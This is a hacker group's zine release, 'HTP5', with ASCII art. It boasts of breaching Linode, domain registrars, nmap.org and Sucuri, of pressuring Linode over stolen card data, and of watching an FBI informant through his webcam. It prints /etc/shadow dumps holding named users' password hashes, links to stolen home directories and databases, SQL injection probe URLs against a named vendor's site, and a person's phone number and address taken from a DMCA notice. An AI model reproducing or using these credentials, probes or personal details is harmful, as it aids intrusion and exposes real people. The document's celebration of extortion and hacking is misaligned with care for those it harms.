░░░░░░░░░░░ ░░░░ ░░░░ ▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░ ▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀ ▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓ ▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████ ▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████ ▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████ ▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███ ▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓ ▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒ ░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░ ░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░ ░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓ ░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓ ░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓ ░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓ ░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒ ░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓ ░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░ ▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒ ▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓ ▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░ ▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒ ▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓ ▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒ ▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒ ▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒ ▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒ ▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒ ░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░ ░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░ ░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░ ░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░ ░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░ ▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░ ▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░ ▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░ ░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░ ░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░ ░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "I'm positive they owned." ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5 ██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄ ██ ▄▄ ▄▄ ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ * Before reading this section of HTP5, we recommend you pop some popcorn. Following HTP4, we were promptly attacked by the next set of skids looking to get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided to take an alternative route, and located us through the development of one of our botnets, Zodiac. We quickly switched into a fallback network and found out they used SwiftIRC. SwiftIRC's nameservers were none other than Linode. Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell stored in their PHPBB MySQL database? if so -- you've finally been expunged ;) - HTP Linode turned out to be safe from our null RDS pass 1day (before Adobe had released their critical advisory). In the meantime, their registrar (name.com) was taken out. We acquired their domain login (along with StackOverflow, DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins. Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned. Back in November, we hinted at Huawei access in our Symantec release. Their registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P However, right in time, our very own HTP zeroday research division manifested subzero.py: a zeroday giving us a direct route into Linode. We proceeded to breach Linode and acquire their in-memory keys. This allowed us to download Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+ init=/bin/bash. Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket, Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5, Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and xnite were customers, but that's getting into another story. Unknown to us at the time, the FBI had successfully accessed HTP. They made their presence obvious, as everything we would get was burned within a few days. However, we merely considered it to be a leak, and waited to use Linode itself to identify the source. Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly identifying themselves as the source of the leaks within HTP. We still considered it a leak, and told Linode that if they did not act upon our already-gained access by 5/1, we would shred all of our Linode-related data. This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH usernames, plaintext LiSH passwords, and employee logins. In the case of noncompliance, we stated that we would drop it all in our release. This was actually quite a good offer. We made it because we didn't care about CCs to begin with (that's directed at everyone on Twitter blaming Linode for identity theft) and because our primary target was SwiftIRC, not Linode. They accepted to protect their customer data/CCs (there wasn't much choice). The FBI got pissed off by this development and forced Linode's hand. After informing them we would follow through and shred all of our Linode data within a week, the FBI and Linode coordinated a release detailing the breach in an email to their customers. We were confused. If they just did this on 5/1, nothing would be affected? Apparently, the FBI did not trust us. We soon found out Linode's situation was not voluntary. Linode was between a rock and a hard place. They had to comply with the FBI (immediately), but doing so would mean all 159,000+ customers would be on Full Disclosure by 5/1. Recognizing their situation, we instead told them that if they acknowledged HTP in their analysis, we'd go ahead and shred their customer data anyway. Readily enabling carders was never part of our plan. They agreed, and we proceeded to delete our copies of the data for them. There was one more loose end to tie. We identified which users on HTP were involved with the FBI, and promptly gained access to one of their cams. Sure enough, there was a handler standing behind him, monitoring his involvement in HTP (hi!). The FBI lost their access into HTP. So what's in this release, if not Linode? EDIT: Hahaha we guess that was too hot, we'll give you guys registrar data instead. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png |- 193K | Linode blog post screenshot 1 ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png |- 179K | Linode blog post screenshot 2 ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt |- 70K | Data on the registars mentioned above. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ░░░░ ░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░ ░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░ ░░▒▒▒▒░░ ░░░▒▒░░▒░░ ░░░░░▒░░ ░░▒▒░░░▒░ ░░░░░▒░░░ ░░▒░░░░░░ ░░░▒░▒░▒░░ ░▒▒░░░░▒░░ ░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░ ░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░ ░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░ ░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░ ░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░ ░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░ ░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░ ░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░ ░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░ ░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░ ░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░ ░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░ ░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░ ░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░ ░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░ ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░ ░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░ ░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░ ░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░ ░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░ ░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░ ░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░ ░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░ ▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░ ░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░ ▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░ ░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░ ░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░ ▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░ ░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░ ░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░ ▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░ ▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░ ▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░ ░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░ ░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░ ░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░ ░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░ ░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░ ░░░░░░░░░░ "You have to let it all go. Fear, doubt, and disbelief." ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5 ██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀ ██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity? ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ Access to nmap.org (Insecure) was gained through Linode, which also included svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy- shit mode beginning when we were backdooring it. We decided to withhold the private releases, including DARPA CINDER Nmap, and release to you the unabridged contents of the /home/ directory including those of Fyodor (Gordon Lyon) and David Fifield. Before we drop you into nmap.com, though, here's their /etc/shadow for those curious: [root@web etc]# cat shadow root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7::: bin:*:14746:0:99999:7::: daemon:*:14746:0:99999:7::: adm:*:14746:0:99999:7::: lp:*:14746:0:99999:7::: sync:*:14746:0:99999:7::: shutdown:*:14746:0:99999:7::: halt:*:14746:0:99999:7::: mail:*:14746:0:99999:7::: news:*:14746:0:99999:7::: uucp:*:14746:0:99999:7::: operator:*:14746:0:99999:7::: games:*:14746:0:99999:7::: gopher:*:14746:0:99999:7::: ftp:*:14746:0:99999:7::: nobody:*:14746:0:99999:7::: vcsa:!!:14746:0:99999:7::: ntp:!!:14746:::::: sshd:!!:14746:::::: fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7::: david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7::: xfs:!!:14782:::::: apache:!!:14782:::::: web:!!:14782:0:99999:7::: postfix:!!:14782:::::: webalizer:!!:14783:::::: mysql:!!:14896:::::: postgres:!!:14897:::::: distcache:!!:14924:::::: pcap:!!:15615:::::: mailman:!!:15666:::::: Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES. By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it a spin. AMIS - Adversary Mission Identification System ============================================== The Adversary Mission Identification System (AMIS) is a computer program that analyzes logs of network scans and reports possible signs of an adversary mission. The AMIS is designed to work with the logs produced by the Nmap Security Scanner. It is part of an overall defensive system that includes periodic scans and their analysis. The AMIS checks for these "tells" that may be signs of an insider mission: * Newly opened ports, particularly those of file servers (e.g. HTTP, FTP, and P2P services). * Differences in files shared by known file servers, including new files, deleted files, and changes in file metadata. * Security vulnerabilities in servers. Enjoy this section of HTP5. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz |- 16GB | Nmap.org: /home/ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ <~REDACTED_1> lol <~REDACTED_1> i got a dmca from cloudflare REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has quit [Client exited] <~REDACTED_3> dmca? <~REDACTED_3> whats copyrighted <~REDACTED_1> Reporter's Name: Gordon Lyon <~REDACTED_1> Reporter's Email Address: gordon@insecure.com <~REDACTED_1> Reporter's Title: CTO <~REDACTED_1> Reporter's Company Name: Insecure.Com LLC <~REDACTED_1> Reporter's Telephone Number: 650-989-4206 <~REDACTED_1> Reporter's Address: 370 Altair Way #113 Sunnyvale, CA US <~REDACTED_1> Reported URLs: <~REDACTED_1> http://straylig.ht/zines/htp5/0x03_nmap.txt <~REDACTED_1> Original Work: They released 16GB of our copyrighted data which they stole. I don't know if copyright applies to our password file, which they stole and released on this page, but it certainly applies to our Adversary Mission Identification System described on the page. REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has joined #thegibson mode/#thegibson [+a REDACTED_2] by chippy1337 <~REDACTED_3> well <~REDACTED_3> that would fit the bill <~REDACTED_3> lets call him up <~REDACTED_3> and take this <~REDACTED_3> to internet court <~REDACTED_3> im seriously considering <~REDACTED_3> printing this out <~REDACTED_3> and framing it on my wall <~REDACTED_3> cuz im lolin so hard <~REDACTED_3> 'sorry, there is a minimum requirement of 20GB before DCMAs are considered admissable in Internet Court' <&REDACTED_4> "What's that? You say there's a hostage situation in your apartment?! We'll call the police right away, sir." ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ lol ▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5 ██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄ ██ ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ "Sucuri is a company that offers a security service that detects unauthorized changes to network (cloud) assets, including web sites, DNS, Whois records, SSL certificates and others. It is also heavily used as an early warning system to detect Malware, Spam and other security issues on web sites and DNS hijacking." Sucuri, why didn't you announce that you got owned? Pretty useless warning system, if you ask us. [root@sucuri www]# uname -a Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686 i386 GNU/Linux 2001, here we come [root@sucuri www]# cat /etc/shadow root:iFvywDsrRwmjI:15755:0:99999:7::: bin:*:14746:0:99999:7::: daemon:*:14746:0:99999:7::: adm:*:14746:0:99999:7::: lp:*:14746:0:99999:7::: sync:*:14746:0:99999:7::: shutdown:*:14746:0:99999:7::: halt:*:14746:0:99999:7::: mail:*:14746:0:99999:7::: news:*:14746:0:99999:7::: uucp:*:14746:0:99999:7::: operator:*:14746:0:99999:7::: games:*:14746:0:99999:7::: gopher:*:14746:0:99999:7::: ftp:*:14746:0:99999:7::: nobody:*:14746:0:99999:7::: vcsa:!!:14746:0:99999:7::: ntp:!!:14746:::::: sshd:!!:14746:::::: dre:mAuUxgVOcOeAE:15678:0:99999:7::: apache:!!:14898:::::: mysql:!!:14898:::::: mailnull:!!:14946:::::: smmsp:!!:14946:::::: ossec:!!:15461:0:99999:7::: ^ OSSEC? Here, We're sure you'll get a kick out of this: TrendMicro (owns OSSEC) DB access via SQLi: http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5 http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4 Included in this segment of HTP5 are the databases of Sucuri's primary site, though labs.sucuri.net and the rest of their VPS's were also compromised. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz |- 2.1MB | Sucuri WP DB's ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "GREGORY D. EVANS, BABY! NUMBA 1!" ░░░▒▒▒▒░░░░░░░ ░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░ ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░ ░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░ ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒ ▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░ ▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒ ▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒ ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒ ░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒ ▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░ ▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒ ░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░ ▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░ ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░ 